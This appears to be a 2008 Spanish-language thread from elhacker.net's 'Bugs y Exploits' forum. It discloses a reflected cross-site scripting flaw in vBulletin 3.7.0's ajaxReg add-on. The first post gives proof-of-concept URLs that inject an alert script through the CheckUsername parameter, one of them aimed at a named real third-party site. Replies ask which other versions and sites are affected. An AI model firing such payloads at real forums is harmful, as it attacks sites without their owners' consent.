elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
06 Julio 2008, 19:27  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  vBulletin 3.7.0 xss
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: vBulletin 3.7.0 xss  (Leído 618 veces)
z1x2c3z1x2c3|
*
Desconectado Desconectado

Mensajes: 30


Ver Perfil
vBulletin 3.7.0 xss
« en: 14 Mayo 2008, 00:08 »

"se requiere ajaxReg para explotar la vulnerabilidad"


El error esta en ajaxReg (http://www.vbulletin.org/forum/showthread.php?t=144869) sirve para comprobar los datos cuando se esta escribiendo ..

POC:
http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=XSS

http://www.site.com/foro/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>

http://www.micro-games.com.ar/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>
http://www.foro-cualquiera.com/ajax.php?do=CheckUsername&param=<script>alert('xss');</script>


:)

publicado en: http://mentespiritual.com/xss.txt
« Última modificación: 14 Mayo 2008, 00:10 por z1x2c3z1x2c3| » En línea
_xtr3m3_
*
Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: vBulletin 3.7.0 xss
« Respuesta #1 en: 14 Mayo 2008, 06:46 »

Y el resto como en el xss de foroswebgratis?
Que otras versiones se joden?

Me sale esto:
Forbidden
You don't have permission to access /foro/ajax.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/1.3.41 Server at www.foro.com Port 80

Se puede hacer algo?  :-\
« Última modificación: 14 Mayo 2008, 09:41 por _xtr3m3_ » En línea
z1x2c3z1x2c3|
*
Desconectado Desconectado

Mensajes: 30


Ver Perfil
Re: vBulletin 3.7.0 xss
« Respuesta #2 en: 14 Mayo 2008, 16:37 »

bueno parece que te tiro un error 404 no debe existir o tener el ajaxReg puede ser eso.no todos lo tienen.y por lo de foroswebgratis lo hice con la intenciòn de mostrar como se podria explotar la vulnerabilidad en realidad no se si funciona en foroswebgratis nunca lo probe.

saludos!

si queres buscar xss aca un buen paper http://milw0rm.com/papers/192
« Última modificación: 14 Mayo 2008, 16:40 por z1x2c3z1x2c3| » En línea
I_xtr3m3_I
*
Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: vBulletin 3.7.0 xss
« Respuesta #3 en: 17 Mayo 2008, 09:54 »

No, es del htaccess, pero eso es lo de menos, parece que el ajaxReg que usa el 3.6.8 no es vulnerable a xss, existe alguna para el 3.6.8?

Soy _xtr3m3_, pero cambié el mail a uno incorrecto y no puedo reactvar la otra cuenta y mejor hice esta  :¬¬ a ver si un admin puede hacer algo.

Gracias por el paper, es muy bueno.
saludos
En línea
741852
*****
Desconectado Desconectado

Mensajes: 1.590


visca la pepaaaaa!


Ver Perfil
Re: vBulletin 3.7.0 xss
« Respuesta #4 en: 17 Mayo 2008, 19:53 »

Gracias por la info.
Yo anteriormente la vulnerabilidad XSS me pensaba que no era importante pero si la sabes usar le puedes sacar mucho partido.

Por cierto, no creo que sea conveniente exponer información de terceros, es decir, poner una web como ejemplo del bug, lo digo por la web esa de micro-games.com.ar pero bueno no creo que alguien vaya a ir haciendo pruebas en esa ¬¬

ale,
salu2 !
En línea

EASY-ADS:

- 0.005$ click
- 0.005$ click referido
- payout: 0.50$ !
- 10-16 ads diarios
- pago en 1 día
- pago mediante paypal

Regístrate aquí:
http://www.easy-ads.info/register.php?r=sagitari
Porfa, no me elimines como referida
Aquí la prueba de que sí que pagan:
http://img295.imageshack.us/img295/8939/easy1pc4.png
Páginas: [1] Ir Arriba Imprimir 
Ir a:  








Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC